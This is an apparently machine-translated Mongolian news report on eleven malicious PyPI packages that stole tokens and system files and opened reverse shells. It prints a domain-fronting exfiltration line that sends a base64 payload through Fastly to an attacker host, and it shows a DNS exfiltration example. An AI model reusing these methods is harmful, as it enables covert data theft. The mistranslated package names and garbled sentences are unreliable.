PyPI (Python Package Index) лавлахаас хортой код агуулсан 11 багцыг илрүүлсэн. Асуудлыг тодорхойлохоос өмнө багцуудыг нийтдээ 38 мянга орчим удаа татаж авсан байна. Илрүүлсэн хортой багцууд нь халдагчдын серверүүдтэй харилцах сувгийг нуух нарийн төвөгтэй аргуудыг ашигладаггаараа онцлог юм.
- чухал багц (6305 удаа татагдсан), чухал багц (12897) - pypi.python.org сайт руу холбогдох нэрийн дор гадаад сервертэй холболт үүсгэж, системд бүрхүүлийн хандалтыг (урвуу бүрхүүл) хийж, trevorc2 програмыг ашиглан мэдээллийг нуусан. харилцааны суваг.
- pptest (10001), ipboards (946) - системийн талаарх мэдээллийг дамжуулахын тулд DNS-ийг холбооны суваг болгон ашигладаг (эхний багцад хостын нэр, ажлын лавлах, дотоод болон гадаад IP, хоёрдугаарт - хэрэглэгчийн нэр, хостын нэр) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - систем дэх Discord үйлчилгээний токеныг тодорхойлж, гадаад хост руу илгээсэн.
- trrfab (287) - танигч, хостын нэр болон /etc/passwd, /etc/hosts, /home-н агуулгыг гадаад хост руу илгээсэн.
- 10Cent10 (490) - гадаад хосттой урвуу бүрхүүлийн холболт үүсгэсэн.
- yandex-yt (4183) - систем эвдэрч, nda.ya.ru (api.ya.cc) сайтаар дамжуулан гаргасан цаашдын үйл ажиллагааны талаарх нэмэлт мэдээлэл бүхий хуудас руу шилжүүлсэн тухай мессежийг харуулав.
Чухал багц болон чухал багц багцуудад ашигладаг гадаад хостуудад хандах арга нь PyPI лавлахад ашигладаг Fastly контент дамжуулах сүлжээг ашиглан үйл ажиллагаагаа нуун дарагдуулах аргыг онцгой анхаарах хэрэгтэй. Үнэн хэрэгтээ хүсэлтийг pypi.python.org сервер рүү илгээсэн (HTTPS хүсэлт дотор SNI-д python.org нэрийг зааж өгөхийг оруулаад), гэхдээ HTTP "Хост" толгой хэсэгт халдагчдын удирддаг серверийн нэрийг оруулсан болно (сек. forward.io. global.prod.fastly.net). Агуулга дамжуулах сүлжээ нь өгөгдөл дамжуулахдаа pypi.python.org руу TLS холболтын параметрүүдийг ашиглан довтолж буй сервер рүү ижил төстэй хүсэлт илгээсэн.
PyPI дэд бүтэц нь Fastly контент түгээлтийн сүлжээгээр тэжээгддэг бөгөөд энэ нь ердийн хүсэлтийг кэш болгохын тулд Varnish ил тод прокси ашигладаг, мөн HTTPS хүсэлтийг проксигаар дамжуулахын тулд эцсийн серверт бус CDN түвшинд TLS сертификатын боловсруулалтыг ашигладаг. Зорилтот хостоос үл хамааран хүсэлтийг прокси руу илгээдэг бөгөөд энэ нь HTTP "Host" толгойг ашиглан хүссэн хостоо тодорхойлдог бөгөөд хост домэйн нэр нь бүх Fastly үйлчлүүлэгчдэд зориулагдсан CDN ачааллын тэнцвэржүүлэгчийн IP хаягуудтай холбогддог.
Халдагчдын сервер мөн CDN Fastly-д бүртгүүлдэг бөгөөд энэ нь хүн бүрт үнэ төлбөргүй төлөвлөгөө гаргаж, бүр нэргүй бүртгэлийг ч зөвшөөрдөг. "Урвуу бүрхүүл" үүсгэх үед хохирогч руу хүсэлт илгээхийн тулд схемийг ашигладаг боловч халдагчийн хост талаас эхлүүлсэн нь анхаарал татаж байна. Гаднаас нь харахад халдагчдын сервертэй харилцах нь PyPI TLS сертификат ашиглан шифрлэгдсэн PyPI лавлахтай хууль ёсны сесс мэт харагдаж байна. "Домэйн фронт" гэгддэг ижил төстэй аргыг өмнө нь SNI-д зохиомол хостыг зааж, HTTPS-д нэвтрэх боломжийг ашиглан зарим CDN сүлжээнд өгөгдсөн боломжийг ашиглан блоклохыг давж гарах үед хостын нэрийг нуухын тулд идэвхтэй ашигладаг байсан. TLS сесс доторх HTTP хостын толгой хэсэгт хүссэн хост.
Хортой үйлдлийг нуухын тулд TrevorC2 багцыг ердийн вэб навигацитай адил сервертэй харилцахад нэмэлтээр ашигласан, жишээлбэл, "https://pypi.python.org/images/" зургийг татаж авах нэрийн дор хортой хүсэлт илгээсэн. guid =” guid параметр дэх мэдээллийн кодчилолтой. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})
Pptest болон ipboards багцууд нь DNS серверийн асуулгад хэрэгтэй мэдээллийг кодлоход тулгуурлан сүлжээний үйл ажиллагааг нуух өөр аргыг ашигласан. Хортой програм нь "nu4timjagq4fimbuhe.example.com" гэх мэт DNS хүсэлтийг гүйцэтгэх замаар мэдээллийг дамжуулдаг бөгөөд үүнд хяналтын серверт дамжуулагдсан өгөгдлийг дэд домайн нэр дэх base64 форматыг ашиглан кодчилдог. Халдагчид example.com домэйны DNS серверийг удирдан эдгээр мессежийг хүлээн авдаг.
Эх сурвалж: opennet.ru